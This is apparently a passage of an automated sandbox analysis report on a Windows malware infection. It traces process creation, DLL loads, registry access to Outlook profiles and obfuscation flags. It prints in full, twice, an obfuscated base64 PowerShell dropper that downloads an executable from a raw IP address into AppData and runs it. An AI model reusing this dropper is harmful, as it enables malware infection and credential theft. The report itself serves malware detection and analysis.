                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD004.tmp" "c:\Users\user\AppData\Local\Temp\qetstupm\CSCEF30E185BA76444FA670BC63B6F1A196.TMP"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\igcc.exe "C:\Users\user\AppData\Roaming\igcc.exe"
                  Source: C:\Users\user\AppData\Roaming\igcc.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Roaming\igcc.exe"
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeProcess created: C:\Windows\SysWOW64\AtBroker.exe "C:\Windows\SysWOW64\AtBroker.exe"
                  Source: C:\Windows\SysWOW64\AtBroker.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwERsHElL.exE -Ex bypass -NOp -w 1 -C DEVIcecreDEntIalDePLoyMEnT.ExE ; IEX($(IEX('[SysteM.texT.ENCoDINg]'+[ChaR]0X3a+[ChaR]58+'utf8.getStrinG([systEm.cONveRt]'+[char]58+[cHar]58+'FrOmbAse64STRinG('+[CHar]0X22+'JFpzb2RoaDdrWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRVJkRWZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1Ukxtb04uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVb2pXamtsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhYW15WG92b08sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZHY09aUFhYaCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJaUXhpdVksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhIbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiY09pYm9lIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxBdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRac29kaGg3a1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjIwOC4yMS8yMzMvaWdjYy5leGUiLCIkRU5WOkFQUERBVEFcaWdjYy5leGUiLDAsMCk7c3RhUnQtc0xlZVAoMyk7aW52T0tlLWlURW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxpZ2NjLmV4ZSI='+[CHaR]34+'))')))"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwERsHElL.exE -Ex bypass -NOp -w 1 -C DEVIcecreDEntIalDePLoyMEnT.ExE ; IEX($(IEX('[SysteM.texT.ENCoDINg]'+[ChaR]0X3a+[ChaR]58+'utf8.getStrinG([systEm.cONveRt]'+[char]58+[cHar]58+'FrOmbAse64STRinG('+[CHar]0X22+'JFpzb2RoaDdrWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRVJkRWZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1Ukxtb04uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVb2pXamtsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhYW15WG92b08sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZHY09aUFhYaCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJaUXhpdVksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhIbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiY09pYm9lIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxBdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRac29kaGg3a1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjIwOC4yMS8yMzMvaWdjYy5leGUiLCIkRU5WOkFQUERBVEFcaWdjYy5leGUiLDAsMCk7c3RhUnQtc0xlZVAoMyk7aW52T0tlLWlURW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxpZ2NjLmV4ZSI='+[CHaR]34+'))')))"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qetstupm\qetstupm.cmdline"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\igcc.exe "C:\Users\user\AppData\Roaming\igcc.exe" Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD004.tmp" "c:\Users\user\AppData\Local\Temp\qetstupm\CSCEF30E185BA76444FA670BC63B6F1A196.TMP"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\igcc.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Roaming\igcc.exe" Jump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeProcess created: C:\Windows\SysWOW64\AtBroker.exe "C:\Windows\SysWOW64\AtBroker.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\AtBroker.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\igcc.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\igcc.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\igcc.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\igcc.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\igcc.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\igcc.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\igcc.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\igcc.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\igcc.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\igcc.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\igcc.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\igcc.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: ieframe.dllJump to behavior
                  Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: mlang.dllJump to behavior
                  Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: winsqlite3.dllJump to behavior
                  Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: vaultcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\AtBroker.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                  Source: Binary string: ATBroker.pdb source: svchost.exe, 0000000D.00000003.1576499115.000000000342B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1576388151.000000000341B000.00000004.00000020.00020000.00000000.sdmp, WRNKS5Hlc0y.exe, 0000000F.00000003.1681787984.0000000000548000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdbUGP source: igcc.exe, 0000000C.00000003.1362520045.0000000004020000.00000004.00001000.00020000.00000000.sdmp, igcc.exe, 0000000C.00000003.1360820679.0000000003E30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1610420128.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1507905161.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1509975834.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1610420128.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000010.00000002.3666132989.00000000052CE000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000010.00000003.1612443700.0000000004F80000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000010.00000003.1609657209.0000000004DD2000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000010.00000002.3666132989.0000000005130000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: igcc.exe, 0000000C.00000003.1362520045.0000000004020000.00000004.00001000.00020000.00000000.sdmp, igcc.exe, 0000000C.00000003.1360820679.0000000003E30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 0000000D.00000002.1610420128.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1507905161.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1509975834.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1610420128.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000010.00000002.3666132989.00000000052CE000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000010.00000003.1612443700.0000000004F80000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000010.00000003.1609657209.0000000004DD2000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000010.00000002.3666132989.0000000005130000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: q7C:\Users\user\AppData\Local\Temp\qetstupm\qetstupm.pdb source: powershell.exe, 00000003.00000002.1374616824.0000000004991000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: ATBroker.pdbGCTL source: svchost.exe, 0000000D.00000003.1576499115.000000000342B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1576388151.000000000341B000.00000004.00000020.00020000.00000000.sdmp, WRNKS5Hlc0y.exe, 0000000F.00000003.1681787984.0000000000548000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: WRNKS5Hlc0y.exe, 0000000F.00000002.3664843128.000000000062F000.00000002.00000001.01000000.0000000A.sdmp

                  Data Obfuscation

                  barindex
                  PowerShell case anomaly found
